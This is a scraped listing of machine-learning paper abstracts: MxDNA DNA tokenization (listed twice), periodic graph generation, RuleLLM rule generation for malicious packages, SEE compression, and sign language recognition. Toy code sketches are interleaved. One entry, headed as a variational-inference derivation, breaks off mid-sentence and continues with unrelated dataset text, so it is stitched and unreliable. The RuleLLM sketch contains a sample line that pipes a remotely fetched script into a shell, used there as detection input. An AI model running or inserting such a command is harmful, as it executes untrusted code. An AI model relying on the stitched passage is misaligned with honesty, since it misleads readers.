Model Decides How to Tokenize: Adaptive DNA Sequence Tokenization with MxDNA

Neural Information Processing Systems

Foundation models have made significant strides in understanding the genomic language of DNA sequences. However, previous models typically adopt tokenization methods designed for natural language, which are unsuitable for DNA sequences due to their unique characteristics. In addition, the optimal approach to tokenizing DNA remains largely under-explored, and may not be intuitively understood by humans even if discovered. To address these challenges, we introduce MxDNA, a novel framework where the model autonomously learns an effective DNA tokenization strategy through gradient descent.





A Derivation of variational inference

Neural Information Processing Systems

The ELBO can be formulated as maximizing the objective of the VAE as in Eq. (4). Based on the condition (i.e., subject to) of the loss function, we enforce z

In total, 3,780 MOFs were selected for the experiment. The QMOF dataset is summarized in Appendix, Table 1. Meshes in the MeshSeg dataset can be formed into graphs of triangle grids. The statistics of the MeshSeg dataset are summarized in Appendix, Table 1.
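Since Eq. (4) of the source is not reproduced here, the following is the standard form of the ELBO for a VAE with encoder $q_\phi(z \mid x)$ and decoder $p_\theta(x \mid z)$, which the passage presumably refers to:

```latex
\log p_\theta(x) \;\ge\; \mathbb{E}_{q_\phi(z \mid x)}\!\left[\log p_\theta(x \mid z)\right] \;-\; \mathrm{KL}\!\left(q_\phi(z \mid x)\,\|\,p(z)\right)
```

Maximizing the right-hand side jointly trains the reconstruction term and regularizes the approximate posterior toward the prior $p(z)$.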


Deep Generative Model for Periodic Graphs

Neural Information Processing Systems

The generative modeling of periodic graphs has great potential in real-world applications such as material design and graphics synthesis. Classical models either rely on domain-specific predefined generation principles (e.g., in crystal net design),


Automatically Generating Rules of Malicious Software Packages via Large Language Model

Zhang, XiangRui, Chen, HaoYu, He, Yongzhong, Niu, Wenjia, Li, Qiang

arXiv.org Artificial Intelligence

Today's security tools predominantly rely on predefined rules crafted by experts, making them poorly adapted to the emergence of software supply chain attacks. To tackle this limitation, we propose a novel tool, RuleLLM, which leverages large language models (LLMs) to automate rule generation for OSS ecosystems. RuleLLM extracts metadata and code snippets from malware as its input, producing YARA and Semgrep rules that can be directly deployed in software development. Specifically, the rule generation task involves three subtasks: crafting rules, refining rules, and aligning rules. To validate RuleLLM's effectiveness, we implemented a prototype system and conducted experiments on a dataset of 1,633 malicious packages. The results are promising: RuleLLM generated 763 rules (452 YARA and 311 Semgrep) with a precision of 85.2% and a recall of 91.8%, outperforming state-of-the-art (SOTA) tools and score-based approaches. We further analyzed the generated rules and proposed a rule taxonomy: 11 categories and 38 subcategories.
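The abstract names three subtasks (crafting, refining, aligning) but not their implementation. The sketch below shows one plausible shape of such a pipeline with a stubbed LLM call; every function name, prompt, and the canned YARA rule are hypothetical illustrations, not RuleLLM's actual code or output.

```python
# Hypothetical sketch of a craft -> refine -> align rule pipeline.
# call_llm is a stub; a real system would call an actual LLM API.

def call_llm(prompt: str) -> str:
    """Stub standing in for an LLM call; returns a canned YARA rule."""
    return (
        'rule suspicious_install_hook {\n'
        '  strings:\n'
        '    $a = "curl http" nocase\n'
        '  condition:\n'
        '    $a\n'
        '}'
    )

def craft_rule(metadata: dict, snippet: str) -> str:
    """Subtask 1: draft a rule from package metadata and a code snippet."""
    prompt = f"Write a YARA rule for package {metadata['name']}:\n{snippet}"
    return call_llm(prompt)

def refine_rule(rule: str) -> str:
    """Subtask 2: ask the model to tighten overly broad patterns."""
    return call_llm(f"Refine this rule:\n{rule}")

def align_rules(rules: list[str]) -> list[str]:
    """Subtask 3: reconcile overlapping rules (here, exact-match dedup only)."""
    seen, out = set(), []
    for r in rules:
        if r not in seen:
            seen.add(r)
            out.append(r)
    return out

meta = {"name": "evil-package"}
rule = refine_rule(craft_rule(meta, 'os.system("curl http://x/i.sh | sh")'))
rules = align_rules([rule, rule])
print(len(rules))  # prints 1: duplicate drafts collapse to one rule
```

A production version would replace the exact-match deduplication in `align_rules` with a semantic comparison, since two LLM-generated rules rarely match character for character.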


Model Decides How to Tokenize: Adaptive DNA Sequence Tokenization with MxDNA

Qiao, Lifeng, Ye, Peng, Ren, Yuchen, Bai, Weiqiang, Liang, Chaoqi, Ma, Xinzhu, Dong, Nanqing, Ouyang, Wanli

arXiv.org Artificial Intelligence

Foundation models have made significant strides in understanding the genomic language of DNA sequences. However, previous models typically adopt tokenization methods designed for natural language, which are unsuitable for DNA sequences due to their unique characteristics. In addition, the optimal approach to tokenizing DNA remains largely under-explored, and may not be intuitively understood by humans even if discovered. To address these challenges, we introduce MxDNA, a novel framework where the model autonomously learns an effective DNA tokenization strategy through gradient descent. MxDNA employs a sparse Mixture of Convolution Experts coupled with a deformable convolution to model the tokenization process, with the discontinuous, overlapping, and ambiguous nature of meaningful genomic segments explicitly considered. On Nucleotide Transformer Benchmarks and Genomic Benchmarks, MxDNA demonstrates superior performance to existing methods with less pretraining data and time, highlighting its effectiveness. Finally, we show that MxDNA learns a unique tokenization strategy distinct from those of previous methods and captures genomic functionalities at a token level during self-supervised pretraining. Our MxDNA aims to provide a new perspective on DNA tokenization, potentially offering broad applications in various domains and yielding profound insights.
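To make the "sparse Mixture of Convolution Experts" idea concrete, here is a toy NumPy sketch of top-1 routing among 1D convolution experts with different receptive fields. This is an illustration of the general mechanism under assumed shapes, not the authors' implementation, and the deformable-convolution component is omitted entirely.

```python
import numpy as np

rng = np.random.default_rng(0)

def conv1d(x, kernel):
    """'Same'-padded single-channel 1D convolution (cross-correlation)."""
    k = len(kernel)
    pad = k // 2
    xp = np.pad(x, (pad, k - 1 - pad))
    return np.array([xp[i:i + k] @ kernel for i in range(len(x))])

seq = rng.standard_normal(16)                          # toy per-position sequence track
experts = [rng.standard_normal(k) for k in (3, 5, 7)]  # conv experts, varied kernel sizes
gate_w = rng.standard_normal((3, 1))                   # toy gating weights

# Sparse gating: each position is routed to its single top-scoring expert.
scores = gate_w @ seq[None, :]                          # (num_experts, seq_len)
choice = scores.argmax(axis=0)                          # chosen expert per position
outputs = np.stack([conv1d(seq, w) for w in experts])   # (num_experts, seq_len)
mixed = outputs[choice, np.arange(len(seq))]            # keep chosen expert's output
print(mixed.shape)  # prints (16,)
```

The varied kernel sizes let different experts cover candidate "tokens" of different lengths; a learned gate then decides, per position, which length applies, which is the intuition behind letting the model decide how to tokenize.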


SEE: Sememe Entanglement Encoding for Transformer-based Models Compression

Zhang, Jing, Sun, Shuzhen, Zhang, Peng, Cao, Guangxing, Gao, Hui, Ma, Xindian, Xu, Nan, Hou, Yuexian

arXiv.org Artificial Intelligence

Transformer-based large language models exhibit groundbreaking capabilities, but their storage and computational costs are prohibitively high, limiting their application in resource-constrained scenarios. An effective approach is to eliminate redundant model parameters and computational costs while incorporating efficient expert-derived knowledge structures to achieve a balance between compression and performance. Therefore, we propose the Sememe Entanglement Encoding (SEE) algorithm. Guided by expert prior knowledge, the model is compressed following the low-rank approximation idea. In Entanglement Embedding, basic semantic units such as sememes are represented as low-dimensional vectors, which are then reconstructed into high-dimensional word embeddings through a combination based on generalized quantum entanglement. We adapt the Sememe Entanglement Encoding algorithm to transformer-based models of different magnitudes. Experimental results indicate that our approach achieves stable performance while compressing model parameters and computational costs.
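The compression arithmetic behind the low-rank approximation idea can be illustrated with a toy factorization of the embedding table: each word is a mixture over a small shared basis of "sememe" vectors. The sizes and the linear mixing rule below are illustrative stand-ins; the paper's generalized quantum entanglement combination is not reproduced here.

```python
import numpy as np

# Toy low-rank embedding compression: words mix a small shared sememe basis.
vocab, dim, n_sememes = 10_000, 768, 200

rng = np.random.default_rng(0)
sememe_vecs = rng.standard_normal((n_sememes, dim))       # shared basis, stored once
word_to_sememe = rng.standard_normal((vocab, n_sememes))  # per-word mixing weights

# High-dimensional word embeddings are reconstructed on the fly.
word_embeddings = word_to_sememe @ sememe_vecs            # (vocab, dim)

full_params = vocab * dim                                 # dense embedding table
compressed_params = vocab * n_sememes + n_sememes * dim   # factorized storage
print(word_embeddings.shape, full_params > compressed_params)
```

With these toy sizes the factorized storage is several times smaller than the dense table, which is the kind of parameter saving a low-rank scheme targets; the quality of the reconstruction then depends on how expressive the combination rule is.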


Stream State-tying for Sign Language Recognition

Ma, Jiyong, Gao, Wen, Wang, Chunli

arXiv.org Artificial Intelligence

Sign language is a visual language conveyed through hand and arm movements accompanied by facial expression and lip motion. The facial expression and lip motion are less important than hand gestures in sign language, but they may help in understanding some hand gestures. Digitized devices can be used to measure the temporal and spatial information of hand gestures; typical devices include data gloves and position trackers. In this paper, we use two CyberGloves and a position tracker, a Polhemus 3SPACE with two receivers positioned on the wrist of each CyberGlove and one fixed at the thorax, as input devices to measure gestures. Chinese sign language is classified into two categories. One is hand gestures, in which each gesture corresponds to a Chinese phrase. The other is fingerspelling, in which each letter corresponds to a posture, and each Chinese sign corresponds to several postures performed continuously.